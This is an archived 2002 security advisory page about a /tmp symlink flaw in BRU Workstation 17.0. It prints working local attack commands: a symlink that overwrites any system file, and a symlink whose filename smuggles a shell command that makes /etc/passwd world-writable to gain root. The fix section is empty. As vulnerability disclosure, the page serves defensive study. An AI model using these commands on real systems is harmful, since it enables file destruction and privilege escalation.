Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: lnx5693.htm

BRU Workstation symlink attack



16th Sep 2002 [SBWID-5693]
COMMAND

	
		BRU Workstation symlink attack
	
	

SYSTEMS AFFECTED

	
		BRU Workstation 17.0
	
	

PROBLEM

	
		'prophecy' [prophecy@prophecy.net.nz] found :
		

		Confirmed testing that this vulnerability can be  used  to  clobber  any
		system file:
		

		ln -s /file/to/clobber /tmp/xbru_dscheck.dd

		

		Confirmed testing that this vulnerability can be  used  to  obtain  root
		via spybreak's
		

		logwatch method (and possibly others):
		

		ln -s /etc/log.d/scripts/logfiles/xferlog/'`cd etc;chmod 666 passwd #`' /tmp/xbru_dscheck.dd

		

		

		Notes:
		

		  - Wait for root to navigate through xbru to 'list archive contents'.

		    (a tape must be present in the tape drive for this to work).
	
	

SOLUTION

	
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH